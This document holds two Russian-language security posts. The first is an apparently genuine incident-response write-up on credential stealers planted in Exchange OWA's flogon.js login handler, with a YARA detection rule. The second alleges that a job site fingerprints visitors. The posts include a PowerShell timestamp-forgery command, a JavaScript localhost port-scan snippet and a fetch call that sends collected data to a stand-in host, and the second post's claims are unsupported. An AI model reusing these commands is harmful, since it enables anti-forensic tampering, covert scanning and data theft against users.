Сложный пароль не поможет 📮

Практика команды реагирования на инциденты информационной безопасности PT ESC IR показывает, что злоумышленники, получая доступ в инфраструктуру компаний, помимо классических бэкдоров и туннелей, иногда встраивают на почтовом сервере дополнительные стилеры учетных записей. Про аналогичное ВПО мы уже рассказывали в прошлом году.

Например, в ходе атаки злоумышленники могут получить доступ к почтовому серверу Microsoft Exchange Server и отредактировать файл C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\XX.X.XXXX\scripts\premium\flogon.js, который является inline-скриптом для главной страницы аутентификации logon.aspx на OWA (Outlook Web Access).

<%= InlineJavascript("flogon.js") %>

Атакующие обычно используют базовые методы антифорензики, подменяя временные метки модифицированным файлам.

$path=".\flogon.js";$time = "2020-01-02 07:24:31";(Get-Item $path).LastWriteTime = $time;(Get-Item $path).CreationTime = $time;(Get-Item $path).LastAccessTime = $time`

Как правило, злоумышленники вносят изменения в функцию clkLgn, которая является обработчиком кнопки входа. В функцию добавляют вредоносный код, который в открытом виде перехватывает все учетные записи (логины и пароли), введенные пользователями при авторизации на OWA.

Рассмотрим два актуальных примера:

1️⃣ В функции clkLgn формируется URL формата https://[REDACTED]/?key1=smthuser&key2=smthpassword, где smthuser — это логин, а smthpassword — пароль перехваченной учетной записи, и отправляется GET-запрос на управляющий сервер (скриншоты 1, 2).

2️⃣ В другом эпизоде злоумышленники предварительно добавляли на сервер дополнительный сценарий check.aspx, задача которого — запись перехваченных учетных данных в лог log.png на диске. Доступ к логу атакующие могли получать из интернета.

Перехват учетных данных, как и в первом примере, осуществлялся модифицированной функцией clkLgn, в код которой была добавлена новая функция chklogin, которая, в свою очередь, вызывала chk, внутри которой формировался URL ./check.aspx?c="smthuser-smthpassword с перехваченными учетными данными в параметре «c» и выполнялся GET-запрос в скрипт check.aspx (скриншоты 3, 4).

👀 Пример журнала log.png:

smthuser-
smthpassword#20250304090723

YARA:

rule PTESC_tool_win_ZZ_clkLgnStealer__Stealer{
  strings:
    $s1 = "//  flogon.js" 
    $s2 = "(\"username\").value"
    $s3 = "(\"password\").value"
    $s4 = "function clkLgn()" 
    $s5 = ".send()" 
  condition:
    all of them and filesize < 20KB
}

Happy hunting!

#ir #hunt #yara #dfir #detect #win
@ptescalator

Кто-то (HH) начитался про сбор данных от гугла и фейсбуков и решил пойти дальше сканируя людей и их окружение и активы.

https://qna.habr.com/q/465498

https://x.com/nightlind/status/911806158230495232

Вот скрипт:
https://jsfiddle.net/Lknb3xez/

Снимается WebGL fingerprint.
Проверяются доступные шрифты, плагины браузера.

Снимается:
1 Часовой пояс
2 Локализация (язык)
3 Характеристики видеокарты и CPU
4 Параметры экрана, доступность WebRTC

5 Пробует подключиться к localhost на разных портах:

127.0.0.1:22 (SSH)
127.0.0.1:5900 (VNC)
127.0.0.1:3389 (RDP)
127.0.0.1:80, 5000, 8080

и др.

let portsToScan = [22, 5900, 3389, 5000, 8080];
portsToScan.forEach(port => {
    let img = new Image();
    img.onload = () => {
        reportOpenPort(port);
    };
    img.onerror = () => {};
    img.src = http://127.0.0.1:${port};
});
Отправка собранных данных
fetch('https://example-hh.ru-backend.com/collect', {
    method: 'POST',
    body: JSON.stringify(collectedData)
});

Скрипт не всегда активен:
Определяет тип устройства, локацию, поведение пользователя (например, неактивен в режиме инкогнито или под VPN).
Внедряется по вероятности или под определённые сценарии.

Совет один - Не открывайте доступ браузеру никуда…